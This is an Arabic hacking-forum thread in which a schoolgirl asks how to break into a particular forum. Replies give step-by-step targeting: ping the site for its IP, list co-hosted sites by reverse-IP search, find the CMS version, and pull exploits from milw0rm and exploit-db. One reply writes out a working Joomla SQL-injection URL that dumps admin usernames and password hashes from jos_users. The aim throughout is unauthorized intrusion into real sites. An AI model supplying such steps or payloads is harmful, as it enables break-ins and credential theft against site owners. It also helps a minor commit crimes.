|
آرجو دخول محترفي ومبدعي [هـآكر الموآآقع] جعل آيديكم مآتمسآه النآر بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته ,, تحية طيبة لكل آعضآء وآدآرة آلمنتدىآ آلمميز وآلرآئع ~ آخوآني محترفي آلهكر آسعد آلله آوقآتكم وبآرك في حيآتكم وآرزآقكم ,, طلب وآقسم بآلله لن آنسى من سيقدم لي هآذآ آلمعروف وآني سإدعي له في كل سجدة خطوآت آخترآق الموآقع رؤؤس آقلآم مو شرح بآلتفصيل يعني آلفكرة ع آيش تعتمد ؟؟ .. !! .. سؤال آخر ,, بعد آلذهآب آلى آلدوس وكتآبة آلآمر Cmd ثم Ping ورآبط آلموقع آو آلمنتدىآ سيظهر آيبي آلسيرفر آلذي يتوآجد عليه هذآ آلموقع آذآ ً الآن حروح لمحرك بحث Live.com وحكتب آلآيبي بعد كتآبته حتطلع كل آلموآآآآآآآآآآآقع آلي ع هآلسيرفر تمآم الآن حطلع السكربت الي مركبه آحد هؤلآء آلموآقع حكتب بعد آلآيبي Powered by طيب بعد هآلخطوة آيش آعمل ؟؟ .. !! .. آعرف آنو بعد مآ آعرف آلسكربت حروح لموووووووووووووقع آلميلآرووووم وحكتب آلسكربت آلي مركبه آحد هؤلآء الموآآآآآآقع بعدهآ آيش آعمل ؟؟ .. !! .. آلله يحرم آلنآر عليكم وآسئل آلله آن يجعل بسمتكم عآدة وحديثكم عبآدة وخآتمتكم شهآدة ورزقكم في زيآدة وحيآتكم سعآدة وآن يدخلكم برضىآ منه آعلىآ جنة ويحقق لكم كل مآ تتمنىآ آمين يآرب العآلمين ,, آختكم |
وعليكم السلام ورحمة الله وبركاته اخي طريقتك صحيحه لما تدخل على موقع الميلورم أبحث عن ثغرات للسكربت تبع الموقع وبعدها شوف اثغرة بأي لغه وترجمها لكي تخترق بها .. انا لسى مبتدئ في هذا المجال وأن شاء الله أحترف فيه :) ونسيت أن اخبرك ياغالي [ أذا تبي تبحث عن ثغرات أبحث في الموقع الجديد والاصلي وهذا هو .: www.exploit-db.com وهذا الموقع البديل [ لان موقع المييلورم www.milw0rm.com متعطل له أربع شهور ] والموقع البديل أصبح جميل وفيه ثغرات جديدهـ ويسمونه [ نسخة الميلورم ] لان أكثر الثغرات الي بـ موقع الميلورم نقلوها ألى الموقع البديل :) ونسيت ان أخبرك أيضأأ [ لاتبحث فقط عن السكربت أبحث ثغرات عن نظام الموقع مثل [ اللنكسس ، والويندوز ] وأفحص الموقع وأبحث عن ثغرات [ الاباتشي ، والويندوز ] الاباتشي صعبه شوي لانها من مبرمجين مشهورين ويبيلها شويه عقل أما الويندوز سهل اختراقاها لانها [ من صنع شركه ماكروسفت ] :) واذا لم تجد ثغرات في الموقع المراد أختراقه [ أبحث عن المواقع الثانيه التي على السيرفر ويمكنك أستخراج المواقع التي على السيرفر كامل عن طريق الاي بي تبع الموقع المستهدف ] :) وأن شاء الله تكون قد [ أخترقت اكثر من موقع ] :) بالتوفيق يابطل :) |
اقتباس:
يعطيك آلف عآفيه يآرب وجزآك ربي آلجنة ويحقق لك كل مآتتمنىآ يسعدك ربي يآرب بس ملآحظة صغيرة بآلمرة آخوي آنآ بنت مو ولد بعضكم بل آكثركم يظن آن آلي بيتعلمو للهكر شبآب !! لآ هذآ كلآم غير صحيح يشهد ربي علي في كل موآقع آلهكر آلي سجلت فيهآ بآسمي آلحقيقي وآني بنت وحآبه آدخل للعلم آلهكرز وآبحر في ذآك العآلم آلجميل وعندي كم سؤآل ممكن :- كيف آعرف نظآم تشغيل آلسيرفر ؟؟ اللنكس ويندوز آلخ ولمآ آدخل ع موقع الميلآروم وآخترت ثغرة بآيش آترجمهآ ؟؟ وكيف ومن وين ؟؟ صحيح معك حق آلمنتدىآ آلي حآبه آخترقه مآموجود فيه ثغرآت لكن في موآقع ع نفس آلسيرفر آلي بيتوآجد عليه هذآ منتدىآ آلي حآبه آخترقه فيهآ ثغرآت شآكره لك كثير ,, جزآك ربي آلجنة آختك |
آآآآآآآآآرجو آآآآآآلرد |
ممممممممممممممممم من نقطه بنبدا المشواااااااار اول شيء بنت ولا ولد مش مشكله بس لكن البعض متعود يتكلم للشباب بدون انتباه (عادي في كثير بنات هكر ) النقطه الثانيه الاستهداف يعد من اعقد الامور وانا بدون اي مشكله بقول لك اني استهدفت كثير سيرفرات لكن حتى الان ما طلعت براس مع اي سيرفر منهم يعني انا بالرغم من كل يلي بعرفه لسا ما عندي امكانيات اني اجيب سيرفر مستهدفه :( الاستهداف بيجي بعد احتراف معظم انواع الثغرات والسبب لنفرض انك عند دخولك موقع ميلورم وجدتي ثغره باحد السكربتات لكن انتي ما بتعرف ايش نوع الثغره لنفرض انك عرفتيه ما بتعرف استغلاله يعني الشغله مش بيوم وليله بتصير بدها تعلم كثير انصحك شيء لاحتراف الاختراق (الاختراق هو قمه احتراف البرمجه ) لانك تجد اخطاء لا ينتبه لها غيرك من المبرمجين ولذا انصحكي بتعلم البرمجه وخاصه php + mysql +asp +perl واسمبلي في الحالات المتقدمه كذا ما ضل نقول لكي غير بعد ما نحترف البرمجه بنحمل حالنا بنتعلم كيف استغلال الثغرات عندك دوره sql + دوره استغلال الثغرات بتتعلميهم وبتتقنيهم وبعد كذا بمسك نفسنا وبنحاول نخترق انا شخصيا لما احاول اخترق سيرفر ابدا بثغره sql لاني متقنها وبعدها بنزل ميلورم اشوف ثغرات السكربتات طيب ما لقيت بميلورم (اذا كان الشيء مهم جدا ) بمسك مواقع السيرفر موقع موقع وابلش فيها فحص ثغرات ولو اتضر احمل السكربت لجهازي وافحصه بجهازي (طبعا عمري ما عملتها اذا ما زبط السيرفر بقله الله معاك ) اتمنا اني افدتك ولو بالقليل |
اقتباس:
جعل آيديك مآتمسآه النآر وآسئل المولىآ آن يدخلك برضىآ منه آعلى جنة ويحقق لك كل مآتتمنىآ آختك |
السلام عليكم اختي عندمى تلقي سركيبت لاي مركب عليه الموقع ادهبي الى www.milw0rm.com واكتبي اسم السكريبت وراح يعطيك الاستغلال الكامل بتوفيق |
اقتباس:
صحيح معك حق تطلع لي بس كيف آعرف آيش آلمقصود آترجمهآ ؟؟ كيف ؟؟ ومن وين ؟؟ يآليت يآ آخوي تشرح آكثر وآسئل آلله آلكريم آلرحيم آن يدخلك جنآت النعيم ويجعلك حآفظآ للقرآن آلكريم جعل يديك مآتمسآه آلنآر يآرب آدعو آلله آن يدخلك آلجنة وبرضىآ منه يحقق لك كل مآتتمنىآ ويسعدك ويوفقك ويجزآك كل خير آحلى تقيم ليك وتستآهل آكثر دعوآت ٍ لك لن تنقطع .. سلمت آيدك آختك |
اختي نفترض انك لقيتي تغرة في www.milw0rm.com راح تلقى مكتوب exploit يعني اسغلال الكامل الان ادحبي الى الموقع واكتبو الاستغلال وراء الموقع ادا اكن مصاب راح يضهر لك الباسورد مشفر و يوزر وانا انصحك تتعلمي تغرة sql لانهى سهل وهناك دورة في المنتدى صوت وصورة اتنمنى اكون افدتك بتوفيق |
اختي الكرـيمة لاختراق موقع معـين اول شيء بتطلعي الايبي تبعه وذالك عبر Start>RUN>Cmd ping www.xxx.com حلو بعـد ماتطلعي الاّيبي معاكي طريقتين الأولى : تشوفي الموقع وش من سكربتات مركبها ,, وافحصي ثغراته , اذا طلعتي ثغره استغليها واخترقي الموقع , وكمان اذا لقيتي اي سكربت روحي شوفي جميع المعلومات الي تقدري تطليعها من السكربت مثلا الاصدار الاسم تروحي ع الميل ورم وتدخلي ع Search واكتبي اسم السكربت مثلا Joomla v 2.0 اوـكي بيطلع لك ثغراات كثير اختاري احدث وحده واستغليها , واخترقي الموقع الطرـيقه الثانيه روحي ع live.com واكتبي : ip:xxxxxx xxxx = ايبي السرفر الي طلعتيه من الدوز بيطلع لك كل المواقع الي ع السرفر الان ممكن تبحثي ع موقع موقع ع السريع حتى تلقي واحد مصاب بسكربت فيه ثغرة استغليها وادعسي الموقع طـبعا بتحتاجي تتعلمي الثغرات وانواعها واستغلالاتها , وكمان لغة ال perl + php + SqL + html هذي اللغات لو اتعلمتيها بتحترفي اختراق المواقع اسرع , وطريقة معرفة انه النضام : windows or linux بتعرفي بعد رفع الشل :) روحي ع دورة فولكاانو للحقن وركزي فيها كثير بتخترقي مواقع كثيير وكمان اجنبيه وممخلة في الاسلام :) ال SQL اكثر ثغره مشهوره وان شاء الله مع الوقت بتحترفي سلاام اخوك Dark Light |
وللنسبه للترجمه طبعا كل ثغره ولها استغلالها عشان كذاا انصحك تتعلمي لغات البرمجه الي ذكرتها فوق لانها بتنفع كثير واذا تابعتي دورة فولكانو بتتعلمي كيف تستغلي ثغرات ال SQL وفي ثغرات مكتوبة في لغات ال Perl >> شفتي كيف تنفع اللغه هذي :) ومن ال php بتتعلمي تطلعي الثغرات من السكربتات وحتى برمجة سكربتات واشياء اكثر اذا في اختراق المواقع ركزي اكثير شيء ع حاجتين فقط اولا : لغات البرمجه ثانيا : الثغرات |
اقتباس:
جعل ايديك ماتمساه النار يارب والله يحقق مبتغاك ويسعدك دوم ويجزاك كل خير عملت كل الي قلت عليه وطلع لي موقع بعد كتابة ايبي السيرفر وكتابة Powered by Joomla Joomla كتبتها في موقع البحث عن الثغرات البديل عن الميلاروم اخترتها وطلعت لي # Title: Joomla Component com_articlemanager SQL Injection Vulnerability # EDB-ID: 11140 # CVE-ID: () # OSVDB-ID: () # Author: FL0RiX # Published: 2010-01-14 # Verified: yes # Download Exploit Code # Download Vulnerable app view source print? ################################################## ###################### # Joomla Component com_articlemanager SQL Injection Vulnerability ################################################## ###################### # Author :FL0RiX # # Name : com_articlemanager # # Bug Type : SQL Injection # # Infection : Admin login bilgileri alinabilir. # # Demo Vuln : # # http://[server]/index.php?option=com...display&artid= # #EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users-- ################################################## ###################### ايش الي انسخه والصقه خلف رابط الموقع الي لما كتبت في محرك live.com الايبي والبورد بي طلعت لي joomla ارجوكم ساعدوني اختكم |
اقتباس:
انا ما اقول الا الله يعطيك الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف عاااااااااااااااافيه وحينما يظهر للأبداع عنوان ويظهر الأنسان جماله وروعته في ردوده يجب علي آن آقدم شكري له ودعائي لك لن ينقطع وفقك الله ورعاك وحقق مبتغاك والله يسعدك ويسدد خطاك ويحرم النار عليك يارب اعجز عن شكرك يا اخي اختك |
آخوآني الله يسعدكم ردوا علي وربي ماكذبت عليكم حروح انام بس لما اشوف ردودكم لأن عندي دوام والله انا بدرس ثالث متوسط الله يسعدكم ردوا علي خطواتي صح والله لا بعدما كتابة ايبي السيرفر وكتابة Powered by Joomla في محرك بحث live.com نسخة Joomla وكتبتها في موقع البحث عن الثغرات البديل عن الميلاروم اخترتها وطلعت لي # Title: Joomla Component com_articlemanager SQL Injection Vulnerability # EDB-ID: 11140 # CVE-ID: () # OSVDB-ID: () # Author: FL0RiX # Published: 2010-01-14 # Verified: yes # Download Exploit Code # Download Vulnerable app view source print? ################################################## ###################### # Joomla Component com_articlemanager SQL Injection Vulnerability ################################################## ###################### # Author :FL0RiX # # Name : com_articlemanager # # Bug Type : SQL Injection # # Infection : Admin login bilgileri alinabilir. # # Demo Vuln : # # http://[server]/index.php?option...display&artid= # #EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users-- ################################################## ###################### ايش الي انسخه والصقه خلف رابط الموقع الي لما كتبت في محرك live.com الايبي والبورد بي طلعت لي joomla فياريت تخبروني الله يجزاااااكم كل خييييييييييير |
يقلك ان السكربت مصاب , بثغرة نوع الثغرة "SQL" مثال ع الثغرة http://[server]/index.php?option...display&artid= Server = اكتبي الموقع المصاب وسوي مثل الرابط الي فوق الاستغلال null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users بيـكون : http://www.server.com/index.php?opti...splay&artid=-2 union select 1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8 +from+jos_users عدد الاعمدة = 8 العمود المصاب = رقم 4 concat(username,0x3a,password)fl0rix أمر يطلع لك باسورد ويوزر القاعدة ان شاء الله يكون مفهوم ع العموم قلت لك تابعي دورة فولكانو وكلها مرفوعه ع اليوتيوب بتوصلك لاحتراف الحقن ان شاء الله :) |
اقتباس:
مشكور ع الدعاء تقبل الله منا ومنك بالتوفيق :Great: |
اقتباس:
فما تنثره هنا و هناك يزيدني أعجابا بقلمك و ذائقتك و أنتقاء أحرف كلماتك يسلموا أيديك ع شرحك الكافي والوافي جاري التجريب وجزاك ربي الجنة يا اخي |
اخواني هل خطواتي صحيحه اقراء معي اروح للدوس واكتب cmd ثم ping عنوان الموقع وانسخه والصقه في محرك بحث live.com ع هذا الشكل ip:______________Powered هذا مثال شوفوا http://www.ar4up.com/uploads/images/...b1b3e04f88.jpg وبعد ما انسخها اروح لموقع ثغرات واختر الثغرة الي تاريخها جديد وبعدها ايش اعمل ؟؟ http://www.ar4up.com/uploads/images/...8bd7cb5847.jpg الي اعرفه اني انسخ رابط من الثغرة الي طلععته من الموقع بس ماعرف ايات الي انسخه ؟؟ الي خلفه كلمة explit ماعرف اكتبها بس من لما اشوفها اعرفها طيب واضعه خلف الرابط واذا ماظهر الباسوورد اجرب ع نفس المواقع الي ع نفس السيرفر وتكون مركبه هالسكربت ؟؟ كلامي صح ام خطآ ؟؟؟؟؟ بستناكم اختكم |
كل الخطوات تمام إلا الان لاكن شكلك فاهمة الموضوع غلط مش كل الثغرات لازم تنسخي رابط وتحطيه الثغراات انواع وهذي الثغره من نوع تغير باسورد الادمن ما اعرف ايش هي في الضـبت الان روحي اتعلمي الثغرات بانواعها واشكالها مابتواجهي هذي المشاكل سلاّم |
اقتباس:
ويوفقك ويرزقك ويحميك ويستر عليك شاكره لك بس وين الاقي الشروحات ؟؟؟ |
1-google.com 2- دورة الحقن vbspiders 3- دورة اكتشاف الثغرات vbspiders خليك ع العناكب وانتضريه في الصيف في قنابل بتحصل فيه :) اهم موقع هو الاول google صديق الهكر فيه كل شيء وكبار الهكر اتعلمو منه , بالتوفيق اختي الكريمه |
اقتباس:
ويجزاك الجنة ويحقق مبتغاك يارب كلماتي ودعواتي احتارت لشكرك يا اخي |
بضيف حاجه مثلا انتي تبي تخترق موقع حلو بحثت عن ثغره ولقيت اسم السكربت وحطيته بالميل روم ظغطت عليه مكتوب فوق على اليمين مثلا perl يعني الثغره بترجمة البيرل يلزمك برنامج مترجم البيرل يعني شوف اتخيل تحمل البرنامج وترجمينها وتطلعين الباسبورد المشفر من خلال جهازك مثال له فديو استغلال ثغرات بغلة البيرل http://www.box.net/shared/yujg50dlq3 وشكرآآآ |
اقتباس:
الله يجزيك الخير ويوفقك ويسعدك ويحقق احلامك الله يسلم يارب شرح رووعة جزاك الله خيييييييير اختك |
كلامهم صحيح حوالي تنذيهم |
| الساعة الآن 10:51 AM |
[ vBspiders.Com Network ]